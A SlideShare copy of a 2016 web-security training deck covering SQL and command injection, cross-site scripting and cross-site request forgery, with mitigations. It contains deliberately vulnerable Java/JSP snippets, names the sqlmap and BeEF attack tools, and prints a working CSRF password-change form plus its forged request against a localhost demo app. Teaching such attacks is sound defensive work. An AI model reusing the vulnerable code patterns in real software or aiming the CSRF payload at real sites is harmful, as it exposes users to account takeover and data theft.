SlideShare une entreprise Scribd logo
1  sur  38
Exploiting and Defending:
Common Web Application
Vulnerabilities
Senior Security Consultant
SANS Instructor
Denver OWASP Chapter Lead
Certifications
CISSP, GWAPT, GSSP-Java, CISM
Contact Info
Steve.kosten@cypressdefense.com
@skosten
Introduction: Steve Kosten
©2016 – Cypress Data Defense, LLC
Introduction
A1: Injection
A3: Cross-Site Scripting (XSS)
A8: Cross-Site Request Forgery (CSRF)
Agenda
©2016 – Cypress Data Defense, LLC
Using real attack tools
Illegal to attack targets without written
contractual consent
Obey all state and federal laws
Cypress Data Defense assumes no liability
Disclaimer
©2016 – Cypress Data Defense, LLC
A1: Injection
©2016 – Cypress Data Defense, LLC
Text-based attacks that exploit the syntax of the
targeted interpreter.
Almost any source of data can be an injection
vector, including internal sources.
Injection flaws occur when an application sends
untrusted data to an interpreter.
A1: Injection
©2016 – Cypress Data Defense, LLC
A1: SQL Injection
©2016 – Cypress Data Defense, LLC
XKCD
©2016 – Cypress Data Defense, LLC
110 million customer records
Email, Mailing addresses, other
Personally Identifiable Information
(PII)
In The News (Target)
©2016 – Cypress Data Defense, LLC
50 million customer records
Email, DOB, Password Hashes,
Challenge Questions & Answers
In The News (Living Social)
©2016 – Cypress Data Defense, LLC
130 million credit card numbers
$200 million loss
In The News (Heartland)
©2016 – Cypress Data Defense, LLC
Command Injection
Inline SQL
A1: Example (1)
rs = statement.executeQuery(
"Select EmployeeId, LastName, FirstName, PhoneNumber "
+
"From Employees " +
"Where EmployeeId = " +
request.getParameter("employeeId"))
Runtime.getRuntime().exec(String.format("myTestProcess.
exe %s", request.getParameter("employeeId")))
©2016 – Cypress Data Defense, LLC
sqlmap DEMO
http://sqlmap.org/
Written in Python
Exploitation DEMO
©2016 – Cypress Data Defense, LLC
Parameterized Queries
A1: Solution
©2016 – Cypress Data Defense, LLC
XSS
Cross-Site Scripting
©2016 – Cypress Data Defense, LLC
XSS flaws occur whenever an application takes untrusted data and
sends it to a web browser without proper encoding.
Execute scripts in the victim’s browser
Hijack user sessions
Deface web sites
Redirect the user to malicious sites.
A3: Cross-Site Scripting (XSS)
©2016 – Cypress Data Defense, LLC
In The News (Sears)
©2016 – Cypress Data Defense, LLC
Site defaced to contain flashing
images designed to cause seizures
Some victims required hospital care
In The News (EF)
©2016 – Cypress Data Defense, LLC
Primaries web site had XSS in the
blog pages
Payloads injected to redirect users to
Hillary Clinton’s election web site
In The News (Obama)
©2016 – Cypress Data Defense, LLC
HTML Context
URL Context
JavaScript Context
Reflected Example
<td><%= request.getParameter("Name") %></td>
<a href='<%= String.format("details.aspx?id=%s",
request.getParameter("Name")) %>'></a>
<a href='<%= String.format("javascript:redirect
('{%s}')", request.getParameter("Name"))
%>'>View</a>
©2016 – Cypress Data Defense, LLC
Browser Exploitation Framework
(BeEF)
http://beefproject.com/
Written in Ruby
Exploitation DEMO
©2016 – Cypress Data Defense, LLC
Encoding, encoding, encoding
Validation is not the solution
Contexts to consider
Html, Url, JavaScript
HtmlAttribute, Css, Xml, XmlAttribute
Mitigations
©2016 – Cypress Data Defense, LLC
Recommended encoding libraries
OWASP Java Encoder
HTTP Security Headers
SourceClear Headlines
X-XSS-Protection
Content-Security-Policy (CSP)
Mitigations (2)
©2016 – Cypress Data Defense, LLC
CSRF
Cross Site Request Forgery
©2016 – Cypress Data Defense, LLC
Researcher earns $10,000 bug
bounty
CSRF vulnerability allowing attackers
to:
Add payment methods
Modify email addresses
Change security questions
Add privileged users
In The News
©2016 – Cypress Data Defense, LLC
Admin console vulnerable to CSRF
allowing attackers to perform the
following:
Modify automatic renewals
Edit zone files
Name server management
In The News (GoDaddy)
©2016 – Cypress Data Defense, LLC
• 2012: Multiple manufacturers
• 4.5 Million Routers Compromised in Brazil
In The News
©2016 – Cypress Data Defense, LLC
A CSRF attack forces a logged-on victim’s browser to send a
forged HTTP request, including the victim’s session cookie and
any other automatically included authentication information.
Audit logs will show the user made the transaction
User has no knowledge of the transaction
Cross-Site Request Forgery
©2016 – Cypress Data Defense, LLC
Multiple Authenticated Sessions
Cross-Site Request Forgery (CSRF) Example
©2016 – Cypress Data Defense, LLC
Payload on attack page
Cross-Site Request Forgery (CSRF) Example (2)
<form id="csrfForm"
action="http://localhost:8080/csrf/content/vulnerable/changepa
ssword" method="POST" >
<input type="hidden" name="newPassword"
value="StorageRoomB" />
<input type="hidden" name="confirmPassword"
value="StorageRoomB" />
</form>
©2016 – Cypress Data Defense, LLC
Request triggered from authenticated session
Cross-Site Request Forgery (CSRF) Example (3)
POST /csrf/content/vulnerable/changepassword HTTP/1.1
Host: localhost:8080
Cookie: JSESSIONID=2E7F523BE6E086F5EEB593B2B69842D2
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
newPassword=StorageRoomB&confirmPassword=StorageRoomB
©2016 – Cypress Data Defense, LLC
200 Response from web site
Cross-Site Request Forgery (CSRF) Example (4)
HTTP/1.1 200 OK
<div class="alert alert-dismissable alert-success">
<span>Your password was successfully changed.</span>
</div>
©2016 – Cypress Data Defense, LLC
Simple Javascript Post
Exploitation DEMO
©2016 – Cypress Data Defense, LLC
CSRF Mitigations
Random nonce for each request
Anti-Forgery Tokens
CSRF Guard (OWASP Project)
Mitigations
©2016 – Cypress Data Defense, LLC
Payload with incorrect csrf token
Cross-Site Request Forgery (CSRF) Solution (1)
<form id="csrfForm"
action="http://localhost:8080/csrf/content/vulnerable/changepa
ssword" method="POST" >
<input type="hidden" name="newPassword"
value="StorageRoomB" />
<input type="hidden" name="confirmPassword"
value="StorageRoomB" />
<input type="hidden" name="&#95;csrf"
value="103ae2a3&#45;d4d6&#45;46e9&#45;8ba6&#45;
92188ff998c2" />
</form>
©2016 – Cypress Data Defense, LLC
Request with invalid token submitted
Cross-Site Request Forgery (CSRF) Solution (2)
POST /csrf/content/vulnerable/changepassword HTTP/1.1
Host: localhost:8080
Cookie: JSESSIONID=2E7F523BE6E086F5EEB593B2B69842D2
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
newPassword=StorageRoomB&confirmPassword=StorageRoomB&_csrf=10
3ae2a3-d4d6-46e9-8ba6-92188ff998c2
©2016 – Cypress Data Defense, LLC
403 response from web site
Cross-Site Request Forgery (CSRF) Example (3)
HTTP/1.1 403 Forbidden
<div class="alert alert-dismissable alert-danger">
<span>java.lang.NullPointerException</span>
</div>
©2016 – Cypress Data Defense, LLC
Questions?
Contact Info
Steve
Twitter: @skosten
Email: steve.kosten@cypressdefense.com
Thanks for attending!
©2016 – Cypress Data Defense, LLC

Contenu connexe

Tendances

Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)Manish Kumar
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf)   it 6873 presentationA8 cross site request forgery (csrf)   it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationAlbena Asenova-Belal
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting GuideDaisuke_Dan
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encodingEoin Keary
 
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...IRJET Journal
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingInMobi Technology
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)OWASP Khartoum
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the WebMike Crabb
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesMarco Morana
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”Capgemini
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applicationsphanleson
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTerrance Medina
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingkinish kumar
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 

Tendances (20)

XSS
XSSXSS
XSS
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf)   it 6873 presentationA8 cross site request forgery (csrf)   it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting Guide
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encoding
 
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the Web
 
Cross site scripting XSS
Cross site scripting XSSCross site scripting XSS
Cross site scripting XSS
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery Vulnerabilities
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applications
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilities
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
 

En vedette

citigroup April 17, 2006 - First Quarter Press Release
citigroup April 17, 2006 - First Quarter Press Releasecitigroup April 17, 2006 - First Quarter Press Release
citigroup April 17, 2006 - First Quarter Press ReleaseQuarterlyEarningsReports
 
Vancouver Olympics Brand Preso
Vancouver Olympics Brand PresoVancouver Olympics Brand Preso
Vancouver Olympics Brand PresoJHA Marketing
 
Connecting and Exploiting Big Data
Connecting and Exploiting Big DataConnecting and Exploiting Big Data
Connecting and Exploiting Big DataR A Akerkar
 
Personal Logo Project
Personal Logo ProjectPersonal Logo Project
Personal Logo ProjectAshley Slade
 
Social Studies 11 - Syllabus
Social Studies 11 - SyllabusSocial Studies 11 - Syllabus
Social Studies 11 - SyllabusAshley Slade
 
Final Day
Final DayFinal Day
Final DayUMUC
 
QBIT - Quiz Generalis Straight Drive Round
QBIT - Quiz Generalis Straight Drive RoundQBIT - Quiz Generalis Straight Drive Round
QBIT - Quiz Generalis Straight Drive RoundQBIT Mesra
 
Hadoop Developer
Hadoop DeveloperHadoop Developer
Hadoop DeveloperEdureka!
 
QBIT - Quiz Generalis Prelims
QBIT - Quiz Generalis PrelimsQBIT - Quiz Generalis Prelims
QBIT - Quiz Generalis PrelimsQBIT Mesra
 
WSO2 Message Broker - Product Overview
WSO2 Message Broker - Product OverviewWSO2 Message Broker - Product Overview
WSO2 Message Broker - Product OverviewWSO2
 
Chakravyuh-3 : Prelims
Chakravyuh-3 : Prelims Chakravyuh-3 : Prelims
Chakravyuh-3 : Prelims QBIT Mesra
 
Ha cluster -Public to Private
Ha cluster -Public to PrivateHa cluster -Public to Private
Ha cluster -Public to Privatetestslidesha12
 

En vedette (19)

Doc
DocDoc
Doc
 
citigroup April 17, 2006 - First Quarter Press Release
citigroup April 17, 2006 - First Quarter Press Releasecitigroup April 17, 2006 - First Quarter Press Release
citigroup April 17, 2006 - First Quarter Press Release
 
Vancouver Olympics Brand Preso
Vancouver Olympics Brand PresoVancouver Olympics Brand Preso
Vancouver Olympics Brand Preso
 
1234
12341234
1234
 
Sonhos e Metas
Sonhos e MetasSonhos e Metas
Sonhos e Metas
 
Connecting and Exploiting Big Data
Connecting and Exploiting Big DataConnecting and Exploiting Big Data
Connecting and Exploiting Big Data
 
Personal Logo Project
Personal Logo ProjectPersonal Logo Project
Personal Logo Project
 
My holiday
My holidayMy holiday
My holiday
 
Social Studies 11 - Syllabus
Social Studies 11 - SyllabusSocial Studies 11 - Syllabus
Social Studies 11 - Syllabus
 
ELA 10 - Syllabus
ELA 10 - SyllabusELA 10 - Syllabus
ELA 10 - Syllabus
 
Final Day
Final DayFinal Day
Final Day
 
QBIT - Quiz Generalis Straight Drive Round
QBIT - Quiz Generalis Straight Drive RoundQBIT - Quiz Generalis Straight Drive Round
QBIT - Quiz Generalis Straight Drive Round
 
Hadoop Developer
Hadoop DeveloperHadoop Developer
Hadoop Developer
 
QBIT - Quiz Generalis Prelims
QBIT - Quiz Generalis PrelimsQBIT - Quiz Generalis Prelims
QBIT - Quiz Generalis Prelims
 
WSO2 Message Broker - Product Overview
WSO2 Message Broker - Product OverviewWSO2 Message Broker - Product Overview
WSO2 Message Broker - Product Overview
 
Variables and constants
Variables and constantsVariables and constants
Variables and constants
 
Chakravyuh-3 : Prelims
Chakravyuh-3 : Prelims Chakravyuh-3 : Prelims
Chakravyuh-3 : Prelims
 
Matek 2. osztály
Matek 2. osztályMatek 2. osztály
Matek 2. osztály
 
Ha cluster -Public to Private
Ha cluster -Public to PrivateHa cluster -Public to Private
Ha cluster -Public to Private
 

Similaire à Steve Kosten - Exploiting common web application vulnerabilities

Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
Hackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web ProgrammingHackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web ProgrammingAkash Mahajan
 
CSRF_RSA_2008_Jeremiah_Grossman
CSRF_RSA_2008_Jeremiah_GrossmanCSRF_RSA_2008_Jeremiah_Grossman
CSRF_RSA_2008_Jeremiah_Grossmanguestdb261a
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Pantallas escaneo Sitio Web
Pantallas escaneo Sitio WebPantallas escaneo Sitio Web
Pantallas escaneo Sitio Webandres1422
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Barrel Software
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Jeremiah Grossman
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareOmer Meshar
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site ScriptingAli Mattash
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009ClubHack
 

Similaire à Steve Kosten - Exploiting common web application vulnerabilities (20)

Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Hackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web ProgrammingHackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web Programming
 
CSRF_RSA_2008_Jeremiah_Grossman
CSRF_RSA_2008_Jeremiah_GrossmanCSRF_RSA_2008_Jeremiah_Grossman
CSRF_RSA_2008_Jeremiah_Grossman
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Pantallas escaneo Sitio Web
Pantallas escaneo Sitio WebPantallas escaneo Sitio Web
Pantallas escaneo Sitio Web
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malware
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
4.Xss
4.Xss4.Xss
4.Xss
 
Hack using firefox
Hack using firefoxHack using firefox
Hack using firefox
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
Session7-XSS & CSRF
Session7-XSS & CSRFSession7-XSS & CSRF
Session7-XSS & CSRF
 
Xssandcsrf
XssandcsrfXssandcsrf
Xssandcsrf
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
Security 101
Security 101Security 101
Security 101
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site Scripting
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
 
Information security
Information securityInformation security
Information security
 

Plus de Trish McGinity, CCSK

Csa privacy by design &amp; gdpr austin chambers 11-4-17
Csa   privacy by design &amp; gdpr austin chambers 11-4-17Csa   privacy by design &amp; gdpr austin chambers 11-4-17
Csa privacy by design &amp; gdpr austin chambers 11-4-17Trish McGinity, CCSK
 
Token Binding as the Foundation for a More Secure Web
Token Binding as the Foundation for a More Secure WebToken Binding as the Foundation for a More Secure Web
Token Binding as the Foundation for a More Secure WebTrish McGinity, CCSK
 
Security and Automation: Can they work together? Can we survive if they don't?
Security and Automation: Can they work together?  Can we survive if they don't?Security and Automation: Can they work together?  Can we survive if they don't?
Security and Automation: Can they work together? Can we survive if they don't?Trish McGinity, CCSK
 
Practical AWS Security - Scott Hogg
Practical AWS Security - Scott HoggPractical AWS Security - Scott Hogg
Practical AWS Security - Scott HoggTrish McGinity, CCSK
 
CSA colorado 2016 presentation CloudPassage
CSA colorado 2016 presentation CloudPassageCSA colorado 2016 presentation CloudPassage
CSA colorado 2016 presentation CloudPassageTrish McGinity, CCSK
 
Csa presentation november 2016 sloane ghx
Csa presentation november 2016 sloane ghxCsa presentation november 2016 sloane ghx
Csa presentation november 2016 sloane ghxTrish McGinity, CCSK
 
Privileged accesss management for den csa user group CA Technologies
Privileged accesss management for den csa user group CA TechnologiesPrivileged accesss management for den csa user group CA Technologies
Privileged accesss management for den csa user group CA TechnologiesTrish McGinity, CCSK
 
Andrew Useckas Csa presentation hacking custom webapps 4 3
Andrew Useckas Csa presentation   hacking custom webapps 4 3Andrew Useckas Csa presentation   hacking custom webapps 4 3
Andrew Useckas Csa presentation hacking custom webapps 4 3Trish McGinity, CCSK
 
Larry Whiteside - Optiv Cloud ready or steam rolled csa version
Larry Whiteside - Optiv Cloud ready or steam rolled csa versionLarry Whiteside - Optiv Cloud ready or steam rolled csa version
Larry Whiteside - Optiv Cloud ready or steam rolled csa versionTrish McGinity, CCSK
 
Scott Hogg - Gtri cloud security knowledge and certs
Scott Hogg - Gtri cloud security knowledge and certsScott Hogg - Gtri cloud security knowledge and certs
Scott Hogg - Gtri cloud security knowledge and certsTrish McGinity, CCSK
 

Plus de Trish McGinity, CCSK (16)

Csa privacy by design &amp; gdpr austin chambers 11-4-17
Csa   privacy by design &amp; gdpr austin chambers 11-4-17Csa   privacy by design &amp; gdpr austin chambers 11-4-17
Csa privacy by design &amp; gdpr austin chambers 11-4-17
 
Privacy 101
Privacy 101Privacy 101
Privacy 101
 
Cloud Seeding
Cloud SeedingCloud Seeding
Cloud Seeding
 
Token Binding as the Foundation for a More Secure Web
Token Binding as the Foundation for a More Secure WebToken Binding as the Foundation for a More Secure Web
Token Binding as the Foundation for a More Secure Web
 
Security and Automation: Can they work together? Can we survive if they don't?
Security and Automation: Can they work together?  Can we survive if they don't?Security and Automation: Can they work together?  Can we survive if they don't?
Security and Automation: Can they work together? Can we survive if they don't?
 
GDPR Overview
GDPR OverviewGDPR Overview
GDPR Overview
 
Practical AWS Security - Scott Hogg
Practical AWS Security - Scott HoggPractical AWS Security - Scott Hogg
Practical AWS Security - Scott Hogg
 
CSA colorado 2016 presentation CloudPassage
CSA colorado 2016 presentation CloudPassageCSA colorado 2016 presentation CloudPassage
CSA colorado 2016 presentation CloudPassage
 
Csa presentation november 2016 sloane ghx
Csa presentation november 2016 sloane ghxCsa presentation november 2016 sloane ghx
Csa presentation november 2016 sloane ghx
 
Privileged accesss management for den csa user group CA Technologies
Privileged accesss management for den csa user group CA TechnologiesPrivileged accesss management for den csa user group CA Technologies
Privileged accesss management for den csa user group CA Technologies
 
Andrew Useckas Csa presentation hacking custom webapps 4 3
Andrew Useckas Csa presentation   hacking custom webapps 4 3Andrew Useckas Csa presentation   hacking custom webapps 4 3
Andrew Useckas Csa presentation hacking custom webapps 4 3
 
Shawn Harris - CCSP SAH v2
Shawn Harris - CCSP SAH v2Shawn Harris - CCSP SAH v2
Shawn Harris - CCSP SAH v2
 
Larry Whiteside - Optiv Cloud ready or steam rolled csa version
Larry Whiteside - Optiv Cloud ready or steam rolled csa versionLarry Whiteside - Optiv Cloud ready or steam rolled csa version
Larry Whiteside - Optiv Cloud ready or steam rolled csa version
 
Ed Rios - New ncc brief
Ed Rios - New ncc briefEd Rios - New ncc brief
Ed Rios - New ncc brief
 
Scott Hogg - Gtri cloud security knowledge and certs
Scott Hogg - Gtri cloud security knowledge and certsScott Hogg - Gtri cloud security knowledge and certs
Scott Hogg - Gtri cloud security knowledge and certs
 
Davitt Potter - CSA Arrow
Davitt Potter - CSA ArrowDavitt Potter - CSA Arrow
Davitt Potter - CSA Arrow
 

Dernier

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistandanishmna97
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024The Digital Insurer
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfOverkill Security
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfOverkill Security
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...apidays
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamUiPathCommunity
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Victor Rentea
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 

Dernier (20)

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
